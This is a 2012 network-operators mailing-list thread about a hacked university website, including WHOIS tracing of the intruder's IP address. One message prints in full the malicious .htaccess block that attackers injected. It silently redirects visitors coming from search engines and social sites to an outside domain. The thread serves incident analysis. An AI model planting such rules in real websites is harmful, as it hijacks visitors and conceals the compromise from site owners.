and upon further investigation, it seems like there might be an actual organization using a host with that IP...
http://www.robtex.com/dns/chatwithus.net.html#shared On Tue, Jul 3, 2012 at 2:27 PM, Kyle Creyts <kyle.cre...@gmail.com> wrote: > it actually appears that skywire has a suballocation for that block, > http://www.robtex.com/ip/208.88.11.111.html#whois > > # > # The following results may also be obtained via: > # http://whois.arin.net <http://www.robtex.com/dns/whois.arin.net.html> > /rest/nets;q=208.88.11.111 <http://www.robtex.com/ip/208.88.11.111.html> > ?showDetails=true&showARIN=false&ext=netref2 > # > > American West Internet SKYWIRE-SG (NET-208-88-11-0-1) > 208.88.11.0<http://www.robtex.com/ip/208.88.11.0.html> > - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html> > > Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) > 208.88.8.0<http://www.robtex.com/ip/208.88.8.0.html> > - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html> > > # > # ARIN WHOIS data and services are subject to the Terms of Use > # available at: > https://www.arin.net<http://www.robtex.com/dns/www.arin.net.html> > /whois_tou.html > # > > On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black > <matthew.bl...@csulb.edu>wrote: > >> By the way, FTP access originated from: 208.88.11.111 >> >> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - >> 208.88.11.255 >> >> NetRange: 208.88.8.0 - 208.88.11.255 >> CIDR: 208.88.8.0/22 >> OriginAS: AS40603 >> NetName: SKYWIRE-SG >> NetHandle: NET-208-88-8-0-1 >> Parent: NET-208-0-0-0-0 >> NetType: Direct Allocation >> Comment: http://www.skywireusa.com >> RegDate: 2008-03-04 >> Updated: 2012-03-02 >> Ref: http://whois.arin.net/rest/net/NET-208-88-8-0-1 >> >> OrgName: Sky Wire Communications >> OrgId: DGSU >> Address: 946 W Sunset Blvd Ste L >> City: St George >> StateProv: UT >> PostalCode: 84770 >> Country: US >> RegDate: 2007-12-04 >> Updated: 2009-11-04 >> Ref: http://whois.arin.net/rest/org/DGSU >> >> >> Who We Are >> Skywire Communications is the Leading High Speed Internet Provider in >> Southern Utah. Offering Service in St George, Washington, Santa Clara, >> Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to >> provide high speed internet access to 100 Percent of Southern Utah. We are >> located in St George, Utah. >> >> >> >> >> matthew black >> information technology services >> california state university, long beach >> >> >> >> -----Original Message----- >> From: Matthew Black [mailto:matthew.bl...@csulb.edu] >> Sent: Wednesday, June 27, 2012 9:52 AM >> To: 'Jason Hellenthal'; Arturo Servin >> Cc: nanog@nanog.org >> Subject: RE: No DNS poisoning at Google (in case of trouble, blame the >> DNS) >> >> Ask and ye shall receive: >> >> # more .htaccess (backup copy) >> >> #c3284d# >> <IfModule mod_rewrite.c> >> RewriteEngine On >> RewriteCond %{HTTP_REFERER} >> ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt >> >> avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea >> >> rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d >> >> ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel >> >> and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea >> >> rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick| >> >> jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l >> >> ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse >> >> arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea >> >> rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s >> >> uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin >> >> e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche| >> >> westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) >> RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L] >> </IfModule> >> #/c3284d# >> >> # # # >> >> matthew black >> information technology services >> california state university, long beach >> >> >> >> -----Original Message----- >> From: Jason Hellenthal [mailto:jhellent...@dataix.net] >> Sent: Wednesday, June 27, 2012 6:26 AM >> To: Arturo Servin >> Cc: nanog@nanog.org >> Subject: Re: No DNS poisoning at Google (in case of trouble, blame the >> DNS) >> >> >> What would be nice is the to see the contents of the htaccess file >> (obviously with sensitive information excluded) >> >> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote: >> > >> > It was not DNS issue, but it was a clear case on how community-support >> helped. >> > >> > Some of us may even learn some new tricks. :) >> > >> > Regards, >> > as >> > >> > Sent from mobile device. Excuse brevity and typos. >> > >> > >> > On 27 Jun 2012, at 05:07, Daniel Rohan <dro...@gmail.com> wrote: >> > >> > > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer < >> bortzme...@nic.fr>wrote: >> > > >> > > What made you think it can be a DNS cache poisoning (a very rare >> > >> event, despite what the media say) when there are many much more >> > >> realistic possibilities (<troll>specially for a Web site written in >> > >> PHP</troll>)? >> > >> >> > >> What was the evidence pointing to a DNS problem? >> > >> >> > > >> > > It seems likely that he made a mistake in his analysis of the >> evidence. >> > > Something that could happen to anyone when operating outside of a >> comfort >> > > zone or having a bad day. Go easy. >> > > >> > > -DR >> > >> >> -- >> >> - (2^(N-1)) >> >> >> >> >> >> >> >> > > > -- > Kyle Creyts > > Information Assurance Professional > BSidesDetroit Organizer > -- Kyle Creyts Information Assurance Professional BSidesDetroit Organizer
